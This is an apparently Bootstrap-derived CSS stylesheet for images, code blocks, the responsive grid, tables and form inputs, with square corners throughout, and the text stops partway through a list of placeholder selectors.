.img-responsive,
.thumbnail > img,
.thumbnail a > img,
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  display: block;
  max-width: 100%;
  height: auto;
}
.img-rounded {
  border-radius: 0px;
}
.img-thumbnail {
  padding: 4px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0px;
  -webkit-transition: all 0.2s ease-in-out;
  -o-transition: all 0.2s ease-in-out;
  transition: all 0.2s ease-in-out;
  display: inline-block;
  max-width: 100%;
  height: auto;
}
.img-circle {
  border-radius: 50%;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.sr-only {
  position: absolute;
  width: 1px;
  height: 1px;
  margin: -1px;
  padding: 0;
  overflow: hidden;
  clip: rect(0, 0, 0, 0);
  border: 0;
}
.sr-only-focusable:active,
.sr-only-focusable:focus {
  position: static;
  width: auto;
  height: auto;
  margin: 0;
  overflow: visible;
  clip: auto;
}
[role="button"] {
  cursor: pointer;
}

code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
code {
  padding: 2px 4px;
  font-size: 90%;
  color: #c7254e;
  background-color: #f9f2f4;
  border-radius: 0px;
}
kbd {
  padding: 2px 4px;
  font-size: 90%;
  color: #ffffff;
  background-color: #333333;
  border-radius: 0px;
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.25);
}
kbd kbd {
  padding: 0;
  font-size: 100%;
  font-weight: bold;
  box-shadow: none;
}
pre {
  display: block;
  padding: 9.5px;
  margin: 0 0 10px;
  font-size: 13px;
  line-height: 1.42857143;
  word-break: break-all;
  word-wrap: break-word;
  color: #444444;
  background-color: #f5f5f5;
  border: 1px solid #cccccc;
  border-radius: 0px;
}
pre code {
  padding: 0;
  font-size: inherit;
  color: inherit;
  white-space: pre-wrap;
  background-color: transparent;
  border-radius: 0;
}
.pre-scrollable {
  max-height: 340px;
  overflow-y: scroll;
}
.container {
  margin-right: auto;
  margin-left: auto;
  padding-left: 15px;
  padding-right: 15px;
}
@media (min-width: 768px) {
  .container {
    width: 750px;
  }
}
@media (min-width: 992px) {
  .container {
    width: 970px;
  }
}
@media (min-width: 1200px) {
  .container {
    width: 1170px;
  }
}
.container-fluid {
  margin-right: auto;
  margin-left: auto;
  padding-left: 15px;
  padding-right: 15px;
}
.row {
  margin-left: -15px;
  margin-right: -15px;
}
.col-xs-1, .col-sm-1, .col-md-1, .col-lg-1, .col-xs-2, .col-sm-2, .col-md-2, .col-lg-2, .col-xs-3, .col-sm-3, .col-md-3, .col-lg-3, .col-xs-4, .col-sm-4, .col-md-4, .col-lg-4, .col-xs-5, .col-sm-5, .col-md-5, .col-lg-5, .col-xs-6, .col-sm-6, .col-md-6, .col-lg-6, .col-xs-7, .col-sm-7, .col-md-7, .col-lg-7, .col-xs-8, .col-sm-8, .col-md-8, .col-lg-8, .col-xs-9, .col-sm-9, .col-md-9, .col-lg-9, .col-xs-10, .col-sm-10, .col-md-10, .col-lg-10, .col-xs-11, .col-sm-11, .col-md-11, .col-lg-11, .col-xs-12, .col-sm-12, .col-md-12, .col-lg-12 {
  position: relative;
  min-height: 1px;
  padding-left: 15px;
  padding-right: 15px;
}
.col-xs-1, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9, .col-xs-10, .col-xs-11, .col-xs-12 {
  float: left;
}
.col-xs-12 {
  width: 100%;
}
.col-xs-11 {
  width: 91.66666667%;
}
.col-xs-10 {
  width: 83.33333333%;
}
.col-xs-9 {
  width: 75%;
}
.col-xs-8 {
  width: 66.66666667%;
}
.col-xs-7 {
  width: 58.33333333%;
}
.col-xs-6 {
  width: 50%;
}
.col-xs-5 {
  width: 41.66666667%;
}
.col-xs-4 {
  width: 33.33333333%;
}
.col-xs-3 {
  width: 25%;
}
.col-xs-2 {
  width: 16.66666667%;
}
.col-xs-1 {
  width: 8.33333333%;
}
.col-xs-pull-12 {
  right: 100%;
}
.col-xs-pull-11 {
  right: 91.66666667%;
}
.col-xs-pull-10 {
  right: 83.33333333%;
}
.col-xs-pull-9 {
  right: 75%;
}
.col-xs-pull-8 {
  right: 66.66666667%;
}
.col-xs-pull-7 {
  right: 58.33333333%;
}
.col-xs-pull-6 {
  right: 50%;
}
.col-xs-pull-5 {
  right: 41.66666667%;
}
.col-xs-pull-4 {
  right: 33.33333333%;
}
.col-xs-pull-3 {
  right: 25%;
}
.col-xs-pull-2 {
  right: 16.66666667%;
}
.col-xs-pull-1 {
  right: 8.33333333%;
}
.col-xs-pull-0 {
  right: auto;
}
.col-xs-push-12 {
  left: 100%;
}
.col-xs-push-11 {
  left: 91.66666667%;
}
.col-xs-push-10 {
  left: 83.33333333%;
}
.col-xs-push-9 {
  left: 75%;
}
.col-xs-push-8 {
  left: 66.66666667%;
}
.col-xs-push-7 {
  left: 58.33333333%;
}
.col-xs-push-6 {
  left: 50%;
}
.col-xs-push-5 {
  left: 41.66666667%;
}
.col-xs-push-4 {
  left: 33.33333333%;
}
.col-xs-push-3 {
  left: 25%;
}
.col-xs-push-2 {
  left: 16.66666667%;
}
.col-xs-push-1 {
  left: 8.33333333%;
}
.col-xs-push-0 {
  left: auto;
}
.col-xs-offset-12 {
  margin-left: 100%;
}
.col-xs-offset-11 {
  margin-left: 91.66666667%;
}
.col-xs-offset-10 {
  margin-left: 83.33333333%;
}
.col-xs-offset-9 {
  margin-left: 75%;
}
.col-xs-offset-8 {
  margin-left: 66.66666667%;
}
.col-xs-offset-7 {
  margin-left: 58.33333333%;
}
.col-xs-offset-6 {
  margin-left: 50%;
}
.col-xs-offset-5 {
  margin-left: 41.66666667%;
}
.col-xs-offset-4 {
  margin-left: 33.33333333%;
}
.col-xs-offset-3 {
  margin-left: 25%;
}
.col-xs-offset-2 {
  margin-left: 16.66666667%;
}
.col-xs-offset-1 {
  margin-left: 8.33333333%;
}
.col-xs-offset-0 {
  margin-left: 0%;
}
@media (min-width: 768px) {
  .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12 {
    float: left;
  }
  .col-sm-12 {
    width: 100%;
  }
  .col-sm-11 {
    width: 91.66666667%;
  }
  .col-sm-10 {
    width: 83.33333333%;
  }
  .col-sm-9 {
    width: 75%;
  }
  .col-sm-8 {
    width: 66.66666667%;
  }
  .col-sm-7 {
    width: 58.33333333%;
  }
  .col-sm-6 {
    width: 50%;
  }
  .col-sm-5 {
    width: 41.66666667%;
  }
  .col-sm-4 {
    width: 33.33333333%;
  }
  .col-sm-3 {
    width: 25%;
  }
  .col-sm-2 {
    width: 16.66666667%;
  }
  .col-sm-1 {
    width: 8.33333333%;
  }
  .col-sm-pull-12 {
    right: 100%;
  }
  .col-sm-pull-11 {
    right: 91.66666667%;
  }
  .col-sm-pull-10 {
    right: 83.33333333%;
  }
  .col-sm-pull-9 {
    right: 75%;
  }
  .col-sm-pull-8 {
    right: 66.66666667%;
  }
  .col-sm-pull-7 {
    right: 58.33333333%;
  }
  .col-sm-pull-6 {
    right: 50%;
  }
  .col-sm-pull-5 {
    right: 41.66666667%;
  }
  .col-sm-pull-4 {
    right: 33.33333333%;
  }
  .col-sm-pull-3 {
    right: 25%;
  }
  .col-sm-pull-2 {
    right: 16.66666667%;
  }
  .col-sm-pull-1 {
    right: 8.33333333%;
  }
  .col-sm-pull-0 {
    right: auto;
  }
  .col-sm-push-12 {
    left: 100%;
  }
  .col-sm-push-11 {
    left: 91.66666667%;
  }
  .col-sm-push-10 {
    left: 83.33333333%;
  }
  .col-sm-push-9 {
    left: 75%;
  }
  .col-sm-push-8 {
    left: 66.66666667%;
  }
  .col-sm-push-7 {
    left: 58.33333333%;
  }
  .col-sm-push-6 {
    left: 50%;
  }
  .col-sm-push-5 {
    left: 41.66666667%;
  }
  .col-sm-push-4 {
    left: 33.33333333%;
  }
  .col-sm-push-3 {
    left: 25%;
  }
  .col-sm-push-2 {
    left: 16.66666667%;
  }
  .col-sm-push-1 {
    left: 8.33333333%;
  }
  .col-sm-push-0 {
    left: auto;
  }
  .col-sm-offset-12 {
    margin-left: 100%;
  }
  .col-sm-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-sm-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-sm-offset-9 {
    margin-left: 75%;
  }
  .col-sm-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-sm-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-sm-offset-6 {
    margin-left: 50%;
  }
  .col-sm-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-sm-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-sm-offset-3 {
    margin-left: 25%;
  }
  .col-sm-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-sm-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-sm-offset-0 {
    margin-left: 0%;
  }
}
@media (min-width: 992px) {
  .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12 {
    float: left;
  }
  .col-md-12 {
    width: 100%;
  }
  .col-md-11 {
    width: 91.66666667%;
  }
  .col-md-10 {
    width: 83.33333333%;
  }
  .col-md-9 {
    width: 75%;
  }
  .col-md-8 {
    width: 66.66666667%;
  }
  .col-md-7 {
    width: 58.33333333%;
  }
  .col-md-6 {
    width: 50%;
  }
  .col-md-5 {
    width: 41.66666667%;
  }
  .col-md-4 {
    width: 33.33333333%;
  }
  .col-md-3 {
    width: 25%;
  }
  .col-md-2 {
    width: 16.66666667%;
  }
  .col-md-1 {
    width: 8.33333333%;
  }
  .col-md-pull-12 {
    right: 100%;
  }
  .col-md-pull-11 {
    right: 91.66666667%;
  }
  .col-md-pull-10 {
    right: 83.33333333%;
  }
  .col-md-pull-9 {
    right: 75%;
  }
  .col-md-pull-8 {
    right: 66.66666667%;
  }
  .col-md-pull-7 {
    right: 58.33333333%;
  }
  .col-md-pull-6 {
    right: 50%;
  }
  .col-md-pull-5 {
    right: 41.66666667%;
  }
  .col-md-pull-4 {
    right: 33.33333333%;
  }
  .col-md-pull-3 {
    right: 25%;
  }
  .col-md-pull-2 {
    right: 16.66666667%;
  }
  .col-md-pull-1 {
    right: 8.33333333%;
  }
  .col-md-pull-0 {
    right: auto;
  }
  .col-md-push-12 {
    left: 100%;
  }
  .col-md-push-11 {
    left: 91.66666667%;
  }
  .col-md-push-10 {
    left: 83.33333333%;
  }
  .col-md-push-9 {
    left: 75%;
  }
  .col-md-push-8 {
    left: 66.66666667%;
  }
  .col-md-push-7 {
    left: 58.33333333%;
  }
  .col-md-push-6 {
    left: 50%;
  }
  .col-md-push-5 {
    left: 41.66666667%;
  }
  .col-md-push-4 {
    left: 33.33333333%;
  }
  .col-md-push-3 {
    left: 25%;
  }
  .col-md-push-2 {
    left: 16.66666667%;
  }
  .col-md-push-1 {
    left: 8.33333333%;
  }
  .col-md-push-0 {
    left: auto;
  }
  .col-md-offset-12 {
    margin-left: 100%;
  }
  .col-md-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-md-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-md-offset-9 {
    margin-left: 75%;
  }
  .col-md-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-md-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-md-offset-6 {
    margin-left: 50%;
  }
  .col-md-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-md-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-md-offset-3 {
    margin-left: 25%;
  }
  .col-md-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-md-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-md-offset-0 {
    margin-left: 0%;
  }
}
@media (min-width: 1200px) {
  .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12 {
    float: left;
  }
  .col-lg-12 {
    width: 100%;
  }
  .col-lg-11 {
    width: 91.66666667%;
  }
  .col-lg-10 {
    width: 83.33333333%;
  }
  .col-lg-9 {
    width: 75%;
  }
  .col-lg-8 {
    width: 66.66666667%;
  }
  .col-lg-7 {
    width: 58.33333333%;
  }
  .col-lg-6 {
    width: 50%;
  }
  .col-lg-5 {
    width: 41.66666667%;
  }
  .col-lg-4 {
    width: 33.33333333%;
  }
  .col-lg-3 {
    width: 25%;
  }
  .col-lg-2 {
    width: 16.66666667%;
  }
  .col-lg-1 {
    width: 8.33333333%;
  }
  .col-lg-pull-12 {
    right: 100%;
  }
  .col-lg-pull-11 {
    right: 91.66666667%;
  }
  .col-lg-pull-10 {
    right: 83.33333333%;
  }
  .col-lg-pull-9 {
    right: 75%;
  }
  .col-lg-pull-8 {
    right: 66.66666667%;
  }
  .col-lg-pull-7 {
    right: 58.33333333%;
  }
  .col-lg-pull-6 {
    right: 50%;
  }
  .col-lg-pull-5 {
    right: 41.66666667%;
  }
  .col-lg-pull-4 {
    right: 33.33333333%;
  }
  .col-lg-pull-3 {
    right: 25%;
  }
  .col-lg-pull-2 {
    right: 16.66666667%;
  }
  .col-lg-pull-1 {
    right: 8.33333333%;
  }
  .col-lg-pull-0 {
    right: auto;
  }
  .col-lg-push-12 {
    left: 100%;
  }
  .col-lg-push-11 {
    left: 91.66666667%;
  }
  .col-lg-push-10 {
    left: 83.33333333%;
  }
  .col-lg-push-9 {
    left: 75%;
  }
  .col-lg-push-8 {
    left: 66.66666667%;
  }
  .col-lg-push-7 {
    left: 58.33333333%;
  }
  .col-lg-push-6 {
    left: 50%;
  }
  .col-lg-push-5 {
    left: 41.66666667%;
  }
  .col-lg-push-4 {
    left: 33.33333333%;
  }
  .col-lg-push-3 {
    left: 25%;
  }
  .col-lg-push-2 {
    left: 16.66666667%;
  }
  .col-lg-push-1 {
    left: 8.33333333%;
  }
  .col-lg-push-0 {
    left: auto;
  }
  .col-lg-offset-12 {
    margin-left: 100%;
  }
  .col-lg-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-lg-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-lg-offset-9 {
    margin-left: 75%;
  }
  .col-lg-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-lg-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-lg-offset-6 {
    margin-left: 50%;
  }
  .col-lg-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-lg-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-lg-offset-3 {
    margin-left: 25%;
  }
  .col-lg-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-lg-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-lg-offset-0 {
    margin-left: 0%;
  }
}
table {
  background-color: transparent;
}
caption {
  padding-top: 8px;
  padding-bottom: 8px;
  color: #999999;
  text-align: left;
}
th {
  text-align: left;
}
.table {
  width: 100%;
  max-width: 100%;
  margin-bottom: 20px;
}
.table > thead > tr > th,
.table > tbody > tr > th,
.table > tfoot > tr > th,
.table > thead > tr > td,
.table > tbody > tr > td,
.table > tfoot > tr > td {
  padding: 8px;
  line-height: 1.42857143;
  vertical-align: top;
  border-top: 1px solid #dddddd;
}
.table > thead > tr > th {
  vertical-align: bottom;
  border-bottom: 2px solid #dddddd;
}
.table > caption + thead > tr:first-child > th,
.table > colgroup + thead > tr:first-child > th,
.table > thead:first-child > tr:first-child > th,
.table > caption + thead > tr:first-child > td,
.table > colgroup + thead > tr:first-child > td,
.table > thead:first-child > tr:first-child > td {
  border-top: 0;
}
.table > tbody + tbody {
  border-top: 2px solid #dddddd;
}
.table .table {
  background-color: #ffffff;
}
.table-condensed > thead > tr > th,
.table-condensed > tbody > tr > th,
.table-condensed > tfoot > tr > th,
.table-condensed > thead > tr > td,
.table-condensed > tbody > tr > td,
.table-condensed > tfoot > tr > td {
  padding: 5px;
}
.table-bordered {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > tbody > tr > th,
.table-bordered > tfoot > tr > th,
.table-bordered > thead > tr > td,
.table-bordered > tbody > tr > td,
.table-bordered > tfoot > tr > td {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > thead > tr > td {
  border-bottom-width: 2px;
}
.table-striped > tbody > tr:nth-of-type(odd) {
  background-color: #f9f9f9;
}
.table-hover > tbody > tr:hover {
  background-color: #f5f5f5;
}
table col[class*="col-"] {
  position: static;
  float: none;
  display: table-column;
}
table td[class*="col-"],
table th[class*="col-"] {
  position: static;
  float: none;
  display: table-cell;
}
.table > thead > tr > td.active,
.table > tbody > tr > td.active,
.table > tfoot > tr > td.active,
.table > thead > tr > th.active,
.table > tbody > tr > th.active,
.table > tfoot > tr > th.active,
.table > thead > tr.active > td,
.table > tbody > tr.active > td,
.table > tfoot > tr.active > td,
.table > thead > tr.active > th,
.table > tbody > tr.active > th,
.table > tfoot > tr.active > th {
  background-color: #f5f5f5;
}
.table-hover > tbody > tr > td.active:hover,
.table-hover > tbody > tr > th.active:hover,
.table-hover > tbody > tr.active:hover > td,
.table-hover > tbody > tr:hover > .active,
.table-hover > tbody > tr.active:hover > th {
  background-color: #e8e8e8;
}
.table > thead > tr > td.success,
.table > tbody > tr > td.success,
.table > tfoot > tr > td.success,
.table > thead > tr > th.success,
.table > tbody > tr > th.success,
.table > tfoot > tr > th.success,
.table > thead > tr.success > td,
.table > tbody > tr.success > td,
.table > tfoot > tr.success > td,
.table > thead > tr.success > th,
.table > tbody > tr.success > th,
.table > tfoot > tr.success > th {
  background-color: #dff0d8;
}
.table-hover > tbody > tr > td.success:hover,
.table-hover > tbody > tr > th.success:hover,
.table-hover > tbody > tr.success:hover > td,
.table-hover > tbody > tr:hover > .success,
.table-hover > tbody > tr.success:hover > th {
  background-color: #d0e9c6;
}
.table > thead > tr > td.info,
.table > tbody > tr > td.info,
.table > tfoot > tr > td.info,
.table > thead > tr > th.info,
.table > tbody > tr > th.info,
.table > tfoot > tr > th.info,
.table > thead > tr.info > td,
.table > tbody > tr.info > td,
.table > tfoot > tr.info > td,
.table > thead > tr.info > th,
.table > tbody > tr.info > th,
.table > tfoot > tr.info > th {
  background-color: #d9edf7;
}
.table-hover > tbody > tr > td.info:hover,
.table-hover > tbody > tr > th.info:hover,
.table-hover > tbody > tr.info:hover > td,
.table-hover > tbody > tr:hover > .info,
.table-hover > tbody > tr.info:hover > th {
  background-color: #c4e3f3;
}
.table > thead > tr > td.warning,
.table > tbody > tr > td.warning,
.table > tfoot > tr > td.warning,
.table > thead > tr > th.warning,
.table > tbody > tr > th.warning,
.table > tfoot > tr > th.warning,
.table > thead > tr.warning > td,
.table > tbody > tr.warning > td,
.table > tfoot > tr.warning > td,
.table > thead > tr.warning > th,
.table > tbody > tr.warning > th,
.table > tfoot > tr.warning > th {
  background-color: #fcf8e3;
}
.table-hover > tbody > tr > td.warning:hover,
.table-hover > tbody > tr > th.warning:hover,
.table-hover > tbody > tr.warning:hover > td,
.table-hover > tbody > tr:hover > .warning,
.table-hover > tbody > tr.warning:hover > th {
  background-color: #faf2cc;
}
.table > thead > tr > td.danger,
.table > tbody > tr > td.danger,
.table > tfoot > tr > td.danger,
.table > thead > tr > th.danger,
.table > tbody > tr > th.danger,
.table > tfoot > tr > th.danger,
.table > thead > tr.danger > td,
.table > tbody > tr.danger > td,
.table > tfoot > tr.danger > td,
.table > thead > tr.danger > th,
.table > tbody > tr.danger > th,
.table > tfoot > tr.danger > th {
  background-color: #f2dede;
}
.table-hover > tbody > tr > td.danger:hover,
.table-hover > tbody > tr > th.danger:hover,
.table-hover > tbody > tr.danger:hover > td,
.table-hover > tbody > tr:hover > .danger,
.table-hover > tbody > tr.danger:hover > th {
  background-color: #ebcccc;
}
.table-responsive {
  overflow-x: auto;
  min-height: 0.01%;
}
@media screen and (max-width: 767px) {
  .table-responsive {
    width: 100%;
    margin-bottom: 15px;
    overflow-y: hidden;
    -ms-overflow-style: -ms-autohiding-scrollbar;
    border: 1px solid #dddddd;
  }
  .table-responsive > .table {
    margin-bottom: 0;
  }
  .table-responsive > .table > thead > tr > th,
  .table-responsive > .table > tbody > tr > th,
  .table-responsive > .table > tfoot > tr > th,
  .table-responsive > .table > thead > tr > td,
  .table-responsive > .table > tbody > tr > td,
  .table-responsive > .table > tfoot > tr > td {
    white-space: nowrap;
  }
  .table-responsive > .table-bordered {
    border: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:first-child,
  .table-responsive > .table-bordered > tbody > tr > th:first-child,
  .table-responsive > .table-bordered > tfoot > tr > th:first-child,
  .table-responsive > .table-bordered > thead > tr > td:first-child,
  .table-responsive > .table-bordered > tbody > tr > td:first-child,
  .table-responsive > .table-bordered > tfoot > tr > td:first-child {
    border-left: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:last-child,
  .table-responsive > .table-bordered > tbody > tr > th:last-child,
  .table-responsive > .table-bordered > tfoot > tr > th:last-child,
  .table-responsive > .table-bordered > thead > tr > td:last-child,
  .table-responsive > .table-bordered > tbody > tr > td:last-child,
  .table-responsive > .table-bordered > tfoot > tr > td:last-child {
    border-right: 0;
  }
  .table-responsive > .table-bordered > tbody > tr:last-child > th,
  .table-responsive > .table-bordered > tfoot > tr:last-child > th,
  .table-responsive > .table-bordered > tbody > tr:last-child > td,
  .table-responsive > .table-bordered > tfoot > tr:last-child > td {
    border-bottom: 0;
  }
}
select,
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.inputbox {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  background-color: #eeeeee;
  opacity: 1;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
